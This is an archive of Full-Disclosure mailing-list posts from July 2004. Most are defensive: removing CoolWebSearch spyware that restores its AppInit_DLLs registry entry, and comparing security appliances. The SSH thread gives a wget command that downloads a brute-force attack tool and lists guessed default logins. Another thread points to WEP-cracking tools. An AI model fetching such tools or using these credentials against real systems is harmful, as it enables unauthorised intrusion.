HijackThis let you see the entry
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_DLLs
(and in most case with no value) BUT when you delete it and click refresh,
it comes immediately back for the trojan is still running.
If you kill the associated running random name dll (for instance
c:\windows\system32\logb.dll) it comes back at next reboot and adds the
value AppInit_DLLs again in the registry.

To get rid of it, you have to rename the key
HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Windows in Windows2 ,
then delete the entry AppInit_DLLs which seems not having any value. When
done, rename the key with its regular name and AppInit_DLLs will not appear
anymore when refreshing ; only when it's done you will be able to kill and
delete the random name.dll for good which is the Backdoor.Agent.ba used to
install this tricky variant of CoolWebSearch.

That's why I said HijackThis has its limits : suppressing the entries its
log gives directly from the registry does not help.

That's just an exemple, the are other variants which add in the registry the
entry AppInit_Dlls somewhere else with the same result and the same way to
get rid of it.

Hoping it's clearer now, so sorry for my poor English.

Regards,
--
http://www.optimix.be.tf /MVP WindowsXP/ http://websecurite.org
http://www.msmvps.com/XPditif/
http://experts.microsoft.fr/longhorn4u/
                         *Helping you void your warranty since 2000*

(*0*) JacK

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: Re: [Full-Disclosure] Cool Web Search

From: Jon (ka1lshhotmail.com)
Date: Fri Jul 30 2004 - 11:38:55 CDT

"BHODemon" works nicely - the home page is
http://www.definitivesolutions.com/bhodemon.htm. Due to recent coverage at
SANS and Slashdot, the following flurry of attention required the author to
get the program distributed via some mirror sites.

----- Original Message -----
From: "Todd Towles" <toddtowlesbrookshires.com>
To: "'Rmuge NineFive '" <rmug9500lycos.co.uk>; "'Disclosure Full'"
<full-disclosurelists.netsys.com>
Sent: Friday, July 30, 2004 10:59 AM
Subject: RE: Re: [Full-Disclosure] Cool Web Search

> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge
NineFive
> Sent: Friday, July 30, 2004 8:47 AM
> To: Disclosure Full
> Subject: Re: Re: [Full-Disclosure] Cool Web Search
>
> Regarding removal of newer versions of Cool Web Search.
>
> See this web page.
>
> http://www.pchell.com/support/onlythebest.shtml
>
> I have encountered the problem described on the page and successfully
> removed the Hijack using Hijackthis
> and AboutBuster.
>
> Spybot and AdAware did not detect the BHO elements.
>
> Film & TV Extras urgently required in your area - See Yourself in major
> Films & TV? Call 0907 1512440 to Register. calls cost 150pm
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: Denis McMahon (denis.mcmahonntlworld.com)
Date: Fri Jul 30 2004 - 13:21:57 CDT

Todd Towles wrote:

> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?

hijackthis shows the bho's

http://www.spywareinfo.com/%7Emerijn/index.html

and some utils from www.sysinternals.com are useful as well:

http://www.sysinternals.com/

esp autoruns and process explorer

Denis

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Bernardo Santos Wernesback (bernardoish.com.br)
Date: Fri Jul 30 2004 - 12:55:04 CDT

Hi all,

A few colleagues and I started a discussion as to why one should or shouldn't buy an appliance-based firewall, ids/ips or other security appliance instead of installing software on a server.

We thought about patching, performance, and other reason for each option but I'd like to hear what other people think.

I would really appreciate if you could share your thoughts with me.

Thanks in advance,

Bernardo Santos Wernesback
Consultant / ISH Tecnologia
Phone: +55-27-3334-8900
email: bernardoish.com.br

 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] New IE patch

From: joe smith (joejoesmith.homeip.net)
Date: Fri Jul 30 2004 - 13:17:58 CDT

Perfect timing for System Admin Day, a new IE patch

http://www.microsoft.com/technet/security/bulletin/ms04-025.mspx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Automated SSH login attempts?

Valdis.Kletnieksvt.edu
Date: Fri Jul 30 2004 - 13:39:40 CDT

On Fri, 30 Jul 2004 09:39:55 EDT, "Neal O'Creat" said:
> Could it be possible that there are different versions of this, one
> making noise and one much rarer one with an exploit?

It's more likely that there's one version, making noise and very rarely finding
a box with stupid passwords. It's possible there's another rare version that
tries several stupid passwords and a few old SSH vulnerabilities. Is there
*any* reliable evidence (even a single box) that appears to have been nailed by
a new exploit?

I'll gladly change my mind, but it will take somebody actually finding a
box running a *recent* SSH and had guest/test/and_so_on properly secured,
and the attack *still* got in....

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBCpXscC3lWbTT17ARAmSzAKC/ViVWigp4F8nfGPKvcl7SP2i6BQCgtTmX
UzJMQh2aK504xm1h8uUV9kY=
=L6v7
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: Andrew Clover (and-bugtraqdoxdesk.com)
Date: Fri Jul 30 2004 - 13:26:55 CDT

Gregh <chowsozemail.com.au> wrote:

> the truth is that this way DOES get rid of it. There are
> at LEAST 5 variants of CWS.

Oh, there are *many* more than that.

> I have met them all and beat them all.

Obviously you have not met the CWS/About variant. This cannot be removed
with only HijackThis and the Task Manager, as its process will recreate
any registry entries you delete. Which process? Every process you are
running, thanks to the AppInit_DLLs entry.

> All easily beaten by using HiJackThis in the way I described.

Well done. Now go install CWS/About, TVMedia/BHO, CommonName/Comwiz and
HuntBar/WinTools, and see how you get on.

HijackThis is a brilliant tool. But it is not a panacea, and the worst
of the crop are starting to code around the things it can do.

--
Andrew Clover
mailto:anddoxdesk.com
http://www.doxdesk.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

Valdis.Kletnieksvt.edu
Date: Fri Jul 30 2004 - 13:32:54 CDT

On Fri, 30 Jul 2004 09:59:54 CDT, Todd Towles <toddtowlesbrookshires.com> said:
> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?

I've always suspected that Browser Helper did for the browser what
Hamburger Helper does for hamburger....

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBCpRWcC3lWbTT17ARAnSnAKCwYafNKyixTvk9gMVQJqSqx83y1wCfafRw
ZKjOkZLjQvpf0cTiVnwe2+I=
=/GmG
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Paul Schmehl (paulsutdallas.edu)
Date: Fri Jul 30 2004 - 13:34:02 CDT

--On Friday, July 30, 2004 02:55:04 PM -0300 Bernardo Santos Wernesback
<bernardoish.com.br> wrote:
>
> A few colleagues and I started a discussion as to why one should or
> shouldn't buy an appliance-based firewall, ids/ips or other security
> appliance instead of installing software on a server.
>
> We thought about patching, performance, and other reason for each option
> but I'd like to hear what other people think.
>
> I would really appreciate if you could share your thoughts with me.
>
1) Most appliance-based devices do not allow access to the operating system
from the application. In fact, they don't even allow access to the
application, except for its configuration.

2) Most appliance-based devices have a kernel and OS that is specifically
built (or the latest buzz word "purpose-built") for the service they
provide, making them capable of running on lower speed processors and lower
memory footprints than a general purpose OS (or conversely, capable of
doing a great deal more with the same CPU speed and memory footprint.)

Those are the two main benefits that I hear most often touted. I haven't
done any research into those claims. Perhaps someone else has?

Paul Schmehl (paulsutdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: Re: [Full-Disclosure] Cool Web Search

From: Aaron Horst (anthrax101gmail.com)
Date: Fri Jul 30 2004 - 12:07:02 CDT

The program is called BHODemon. It is available from Definitive Solutions here:

http://www.definitivesolutions.com/bhodemon.htm

On Fri, 30 Jul 2004 09:59:54 -0500, Todd Towles
<toddtowlesbrookshires.com> wrote:
> There is a free piece of software somewhere that will grab all the BHOs
> (Browser Helper Objects) out of the registry and display them all. Anyone
> remember where this software can be found?
>
>
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Rmuge NineFive
> Sent: Friday, July 30, 2004 8:47 AM
> To: Disclosure Full
> Subject: Re: Re: [Full-Disclosure] Cool Web Search
>
> Regarding removal of newer versions of Cool Web Search.
>
> See this web page.
>
> http://www.pchell.com/support/onlythebest.shtml
>
> I have encountered the problem described on the page and successfully
> removed the Hijack using Hijackthis
> and AboutBuster.
>
> Spybot and AdAware did not detect the BHO elements.
>
> Film & TV Extras urgently required in your area - See Yourself in major
> Films & TV? Call 0907 1512440 to Register. calls cost 150pm
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Max Valdez (maxvaldefis.unam.mx)
Date: Fri Jul 30 2004 - 13:26:12 CDT

Because you dont know that much about security ??? ( a theoretical "you" !!)

If you know what you need, and what can you do, you do it by yourself, and
only rely on your capacities.

If you need protection, or at least some kind of monitoring activity, but dont
know much about network security, then you go an buy a solution

Thats what I think

BTW, all the network admins I know use firewall for protection, but dont now
much aside from that, most of the time use some kind of precoded rules, and
keep it like that forever.

--
Linux garaged 2.6.7-rc3-mm2 #2 Sat Jun 19 15:43:32 CDT 2004 i686 Intel(R)
Pentium(R) 4 CPU 2.80GHz GenuineIntel GNU/Linux
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GS/S d- s: a-29 C++(+++) ULAHI+++ P+ L++>+++ E--- W++ N* o-- K- w++++ O- M--
V-- PS+ PE Y-- PGP++ t- 5- X+ R tv++ b+ DI+++ D- G++ e++ h+ r+ z**
------END GEEK CODE BLOCK------
gpg-key: http://garaged.homeip.net/gpg-key.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: Re: [Full-Disclosure] Cool Web Search

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 14:13:02 CDT

Jack, the new variants are not so obvious to detect. They contain hidden
processes or rootkits. Sooner or later they will start to use ADS (alternate
data stream) points to hide.

Anyone can track down anything with a registry snapshot. Do a registry
snapshot and then install your "spyware" and then you will see every key.
But what good is that if you have to clean more than one computer.

We are all computer people - fixing one computer is easy but could take 4
hours - not very helpful on a mass scale. We pay for point and click, why
shouldn't we get it? ;)

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of JacK
Sent: Friday, July 30, 2004 11:56 AM
To: full-disclosurelists.netsys.com
Subject: Re: Re: [Full-Disclosure] Cool Web Search

> I don't know if you fully understand HiJackThis or maybe I was just
> unclear.

> HiJackThis wasn't used by me to get rid of CWS as, for example, running
> Adaware gets rid of tracking cookies and some installed spyware progs. It
> was used by me to list various entries in registry which, when lumped
> together like that, show off CWS quite easily. Once they are there,
> removing
> them and the progs started by some of them is easy.

> That is all you have to do. Don't expect HiJackThis to magically get rid
> of
> it all at the flick of a button. You DO have to have a small amount of
> registry knowledge in order to ID which entries are seriously bull and
> which
> are honest BHOs etc. I am not a registry "expert" but claim a small amount
> of registry knowledge so even to ME it was obvious what was what.

It 's obvious you did not get the variants I am speaking about and you are
no Registry "expert" ;)

For those variants :

HijackThis let you see the entry
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Windows\AppIn
it_DLLs
(and in most case with no value) BUT when you delete it and click refresh,
it comes immediately back for the trojan is still running.
If you kill the associated running random name dll (for instance
c:\windows\system32\logb.dll) it comes back at next reboot and adds the
value AppInit_DLLs again in the registry.

To get rid of it, you have to rename the key
HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Windows in Windows2 ,
then delete the entry AppInit_DLLs which seems not having any value. When
done, rename the key with its regular name and AppInit_DLLs will not appear
anymore when refreshing ; only when it's done you will be able to kill and
delete the random name.dll for good which is the Backdoor.Agent.ba used to
install this tricky variant of CoolWebSearch.

That's why I said HijackThis has its limits : suppressing the entries its
log gives directly from the registry does not help.

That's just an exemple, the are other variants which add in the registry the

entry AppInit_Dlls somewhere else with the same result and the same way to
get rid of it.

Hoping it's clearer now, so sorry for my poor English.

Regards,
--
http://www.optimix.be.tf /MVP WindowsXP/ http://websecurite.org
http://www.msmvps.com/XPditif/
http://experts.microsoft.fr/longhorn4u/
                         *Helping you void your warranty since 2000*

(*0*) JacK

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Stefan Janecek (stefan.janecekjku.at)
Date: Fri Jul 30 2004 - 14:20:14 CDT

On Fri, 2004-07-30 at 13:51, Jan Muenther wrote:
> Now, if anybody could jump through the hoop and send me the thing or make it
> publicly available... all these things are musings, 'it looks as if...' and 'it
> seems like...' are not exactly results of an analysis.

Agreed. The thing *is* publicly available, just do 'wget
frauder.us/linux/ssh.tgz'. What kept me from disassembling the thing so
far is not availability, but lacking knowledge about the ssh protocol on
my side ;-)
 
>
> Just tracing tcpdump's output is definitely insufficient.
> If the tool just sends normal TCP packets, then why does it need root rights,
> which you typically only require for raw sockets to build packets which can't
> be constructed with SOCK_STREAM or SOCK_DGRAM?
>

The tool itself dos not need root rights. What needs to be root is the
portscanner accompanying it.

> I hope you don't run it on your production boxes in the normal userland - ever
> considered the fact it might contain an ELF infector or something?
> Now, if I wanted to deploy malware on a Linux box, I'd just come up with a
> mysterious looking tool and let that infect the machines of people who just
> run anything they can get a hold of. It's Linux, after all, right? No viruses,
> right?

hehe. According to a brief look at the strace of this thingy, it does
not do anything suspicious on the local box. But maybe I should have a
second look - who knows?

>
> > >Do I take it that these things are just trying to log in using some
> > >guessed password(s) ? Out of interest, do we have any idea what these
> > >opportunistic passwords might be ?
> >
> > At least two of them are guest:guest and test:test. I'd guess that
> > root:root and adminadmin are on the list too :-)
>
> This things needs to be disassembled, debugged and traced. All else is just
> whistling in the dark. Meh.

Right. And somebody volunteered for this job right now, did you? ;-)

cheers,
Stefan

>
> Cheers, J.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Andrew Farmer (andfarmteknovis.com)
Date: Fri Jul 30 2004 - 15:28:33 CDT

On 30 Jul 2004, at 04:51, Jan Muenther wrote:
> Now, if anybody could jump through the hoop and send me the thing or
> make it
> publicly available... all these things are musings, 'it looks as
> if...' and 'it
> seems like...' are not exactly results of an analysis.

Someone had posted a link to the package -
http://frauder.us/linux/ssh.tgz IIRC.
I've got a copy if the original's down.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFBCq9xPa6RRaKl0ScRAoWqAKCL2fObbVwzdidj/0Y65eOHr6zPrgCgk4dW
+/mRrtXdUjQUXv/r0+1PVFo=
=LVWB
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Security Web Site Hosting

From: n30 (n30_listshotmail.com)
Date: Fri Jul 30 2004 - 10:08:06 CDT

Friends,

Trying to start a good free security site....

Any recommendations on site hosting services / Portal framewroks / site
builders...

I have the concept in mind but no time to build the site or resources to
host it myself...

Any help appreciated!!
Thanks
-h

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: Re: [Full-Disclosure] Cool Web Search

From: Ron DuFresne (dufresnewinternet.com)
Date: Fri Jul 30 2004 - 15:40:06 CDT

. We pay for point and click, why shouldn't we get it? ;)
>

<ROFL>!!! you do, you get it and then pay, and pay and pay again, each and
every new win sploit that is released. And then pay again to have them
MSCE's stare blankly at the root cause....

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

Valdis.Kletnieksvt.edu
Date: Fri Jul 30 2004 - 15:45:46 CDT

On Fri, 30 Jul 2004 14:55:04 -0300, Bernardo Santos Wernesback <bernardoish.com.br> said:

> A few colleagues and I started a discussion as to why one should or shouldn't
> buy an appliance-based firewall, ids/ips or other security appliance instead of
> installing software on a server.

Does "installing software on a server" mean:

a) Building your own sentinel/gateway box and installing security software on it
or
b) installing security software directly on the server that needs protection?

> We thought about patching, performance, and other reason for each option but
> I'd like to hear what other people think.

An often overlooked issue is that the right choice for a clued and technically
competent site is quite often a poor choice for a site that's not able to
get its clue together. And there's a lot more of the latter than the former.

The best thing about an appliance is it's an *appliance* - a site can get
it, park it in its spot, plug the DMZ-side and inside-side cables into it,
do a little bit of basic config, and it works. The more configuration
knobs, the more chances to break it by accident.

And if you're installing software directly on the server that needs protecting,
that's just a disaster waiting to happen, especially in the Windows world -
the last thing a low-level admin needs is for the security software to install
a DLL that's incompatible with the service to be protected.....

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFBCrN5cC3lWbTT17ARAkpFAKCnyinXWi50wW+crTScfxvjd5xUTwCgrZmf
REOBFyhkW5l0p5F5JMRCggs=
=NzdN
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 15:43:14 CDT

Max,

How big are these networks that use default firewall rules? In a large
growing corporate network, we have to deal with stuff all the time. Users
want to do that...some other company or vendor needs a port open to do
something. They want you to just do it because all the other companies do
it. Kinda sad. Lol

Fault-tolerance firewalls, border routers, proxy with virus scan...access
list, IDS, you know you need the works to protect a enterprise size network.

Todd

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Max Valdez
Sent: Friday, July 30, 2004 1:26 PM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Why should one buy (or not) an
Appliance-based security gateway?

Because you dont know that much about security ??? ( a theoretical "you" !!)

If you know what you need, and what can you do, you do it by yourself, and
only rely on your capacities.

If you need protection, or at least some kind of monitoring activity, but
dont
know much about network security, then you go an buy a solution

Thats what I think

BTW, all the network admins I know use firewall for protection, but dont now

much aside from that, most of the time use some kind of precoded rules, and
keep it like that forever.

--
Linux garaged 2.6.7-rc3-mm2 #2 Sat Jun 19 15:43:32 CDT 2004 i686 Intel(R)
Pentium(R) 4 CPU 2.80GHz GenuineIntel GNU/Linux
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GS/S d- s: a-29 C++(+++) ULAHI+++ P+ L++>+++ E--- W++ N* o-- K- w++++ O- M--

V-- PS+ PE Y-- PGP++ t- 5- X+ R tv++ b+ DI+++ D- G++ e++ h+ r+ z**
------END GEEK CODE BLOCK------
gpg-key: http://garaged.homeip.net/gpg-key.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] WEP Crack utility for Windows XP

From: Simmons, Thomas (Thomas.Simmonsncfcorp.com)
Date: Fri Jul 30 2004 - 15:53:17 CDT

Does anyone know of a good WEP Cracking Utility that will run on Windows
XP.

Thomas Simmons
Network\Server Support
Thomas.SimmonsNCFCorp.Com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
FW: [Full-Disclosure] Cool Web Search

From: Simmons, Thomas (Thomas.Simmonsncfcorp.com)
Date: Fri Jul 30 2004 - 15:58:28 CDT

I have found that if you do an "end process tree" on everything running
that you don't want. Then run through the "ADD & Remove" to remove
everything that you see is not wanted. Follow up with Spybot S&D and
then use HijackThis to remove unwanted Reg problems. Often during the
process of removing apps or even using Spybot you have to reboot and
that requires that you run through the "end process tree" function each
time. I follow up with one last sweep through "add & remove Programs".
This is usually a successful way to remove all Spyware Apps without much
complication.

Thomas Simmons
Network/Server Support

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Andrew
Clover
Sent: Friday, July 30, 2004 6:44 AM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Cool Web Search

Gregh <chowsozemail.com.au> wrote:

> It was used by me to list various entries in registry which, when
lumped
> together like that, show off CWS quite easily. Once they are there,
removing
> them and the progs started by some of them is easy.

This is not the case for all variants of CWS. The newer, sneakier
variants can rebuild themselves if they detect a program like HijackThis

removing their registry entries.

This is part of a strong trend in unsolicited commercial software,
copying survival techniques learned from virus authors. The use of
constantly-loaded multiple DLLs and/or processes and/or services that
all restart and repair each other if tampering is detected, is becoming
widespread (see also CommonName, ClearSearch, TVMedia etc.).

Where there are not short-cut workarounds this means removing the
software manually is simply impossible. Currently a trip into Safe Mode
can do the trick, by stopping any of the software running, but I'm sure
that'll be worked around too eventually. (Rootkit-like spyware?)

--
Andrew Clover
mailto:anddoxdesk.com
http://www.doxdesk.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Cool Web Search

From: Schmidt, Michael R. (Michael.SchmidtT-Mobile.com)
Date: Fri Jul 30 2004 - 16:10:30 CDT

I will take up arms to write a cleaner for it. I despise programs like this

Since we are talking about 30 variations does anyone know where a person can get archived versions of all of these?

I've got a machine and the tools and know how to build the tool. I just need to be "infected" - wow, 30 variants. That is truly ugly.

Thanks

Michael R. Schmidt

-----Original Message-----
From: full-disclosure-adminlists.netsys.com [mailto:full-disclosure-adminlists.netsys.com]On Behalf Of Andrew Clover
Sent: Friday, July 30, 2004 11:27 AM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Cool Web Search

Gregh <chowsozemail.com.au> wrote:

> the truth is that this way DOES get rid of it. There are
> at LEAST 5 variants of CWS.

Oh, there are *many* more than that.

> I have met them all and beat them all.

Obviously you have not met the CWS/About variant. This cannot be removed
with only HijackThis and the Task Manager, as its process will recreate
any registry entries you delete. Which process? Every process you are
running, thanks to the AppInit_DLLs entry.

> All easily beaten by using HiJackThis in the way I described.

Well done. Now go install CWS/About, TVMedia/BHO, CommonName/Comwiz and
HuntBar/WinTools, and see how you get on.

HijackThis is a brilliant tool. But it is not a panacea, and the worst
of the crop are starting to code around the things it can do.

--
Andrew Clover
mailto:anddoxdesk.com
http://www.doxdesk.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: Gregh (chowsozemail.com.au)
Date: Fri Jul 30 2004 - 16:29:22 CDT

----- Original Message -----
From: "Andrew Clover" <and-bugtraqdoxdesk.com>
To: <full-disclosurelists.netsys.com>
Sent: Saturday, July 31, 2004 4:26 AM
Subject: Re: [Full-Disclosure] Cool Web Search

> Gregh <chowsozemail.com.au> wrote:
>
> > the truth is that this way DOES get rid of it. There are
> > at LEAST 5 variants of CWS.
>
> Oh, there are *many* more than that.
>
> > I have met them all and beat them all.
>
> Obviously you have not met the CWS/About variant. This cannot be removed

Look, I have reported how easily it can be removed. If all you want to do is
argue about it, I have to tell you that I cant beat that. If you want to try
it for yourself, you'll see it is easy to do the way I described.

I have said all I can on this subject now. The rest if up to you lot. If you
reading this want to try, you'll see how ridiculously easy it is to remove
it. If you don't want to try and want to say it cant be done, then for you
saying that, obviously it cant.

Greg.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 16:00:29 CDT

I haven't done too much research into appliance-based devices but you would
guess that are set up for one purpose.

If I was going to build a Snort IDS box, it wouldn't have telnet open and it
wouldn't use HTTP (unless I was using ACID, then I would use SSL).

If I wanted to make a DHCP server - I would take Linux and strip the kernel
of all unneeded modules and recompile. Turn off all unneeded services and
make the image reuseable.

Appliance-based devices should use the same idea. But maybe they are like
cars. You can buy a sports car...which is designed for speed. Yet the fuel
map isn't tuned like it could be and that is a lot of back pressure in the
exhaust.

Basically, it comes down to how much do you want to learn about network
security and how secure do you want to me. Will properly fine-tuned homemade
system beat an applicance? - yes!. But can everyone built that system, No!

Wow did that make any sense? lol

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Paul Schmehl
Sent: Friday, July 30, 2004 1:34 PM
To: Bernardo Santos Wernesback; full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Why should one buy (or not) an
Appliance-based security gateway?

--On Friday, July 30, 2004 02:55:04 PM -0300 Bernardo Santos Wernesback
<bernardoish.com.br> wrote:
>
> A few colleagues and I started a discussion as to why one should or
> shouldn't buy an appliance-based firewall, ids/ips or other security
> appliance instead of installing software on a server.
>
> We thought about patching, performance, and other reason for each option
> but I'd like to hear what other people think.
>
> I would really appreciate if you could share your thoughts with me.
>
1) Most appliance-based devices do not allow access to the operating system
from the application. In fact, they don't even allow access to the
application, except for its configuration.

2) Most appliance-based devices have a kernel and OS that is specifically
built (or the latest buzz word "purpose-built") for the service they
provide, making them capable of running on lower speed processors and lower
memory footprints than a general purpose OS (or conversely, capable of
doing a great deal more with the same CPU speed and memory footprint.)

Those are the two main benefits that I hear most often touted. I haven't
done any research into those claims. Perhaps someone else has?

Paul Schmehl (paulsutdallas.edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Cool Web Search

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 17:58:00 CDT

Then we await your very simple tool to remove this bad spyware. If you can
do it with Hijack This...then maybe you should talk to the author and start
work on a new program.

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Gregh
Sent: Friday, July 30, 2004 4:29 PM
To: Disclosure Full
Subject: Re: [Full-Disclosure] Cool Web Search

----- Original Message -----
From: "Andrew Clover" <and-bugtraqdoxdesk.com>
To: <full-disclosurelists.netsys.com>
Sent: Saturday, July 31, 2004 4:26 AM
Subject: Re: [Full-Disclosure] Cool Web Search

> Gregh <chowsozemail.com.au> wrote:
>
> > the truth is that this way DOES get rid of it. There are
> > at LEAST 5 variants of CWS.
>
> Oh, there are *many* more than that.
>
> > I have met them all and beat them all.
>
> Obviously you have not met the CWS/About variant. This cannot be removed

Look, I have reported how easily it can be removed. If all you want to do is
argue about it, I have to tell you that I cant beat that. If you want to try
it for yourself, you'll see it is easy to do the way I described.

I have said all I can on this subject now. The rest if up to you lot. If you
reading this want to try, you'll see how ridiculously easy it is to remove
it. If you don't want to try and want to say it cant be done, then for you
saying that, obviously it cant.

Greg.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] WEP Crack utility for Windows XP

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 18:01:38 CDT

Grab a copy of any Linux Live-CD and boot it up. Most have AirSnort, Kismet,
Nmap, Ethereal, Ettercap included. You must find the right wireless card to
work with them however.

www.knoppix.com

www.knoppix-std.org/tools.html

www.moser-informatik.ch/

BTW, has WEPCrack ever been ported to Win32?

Todd

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
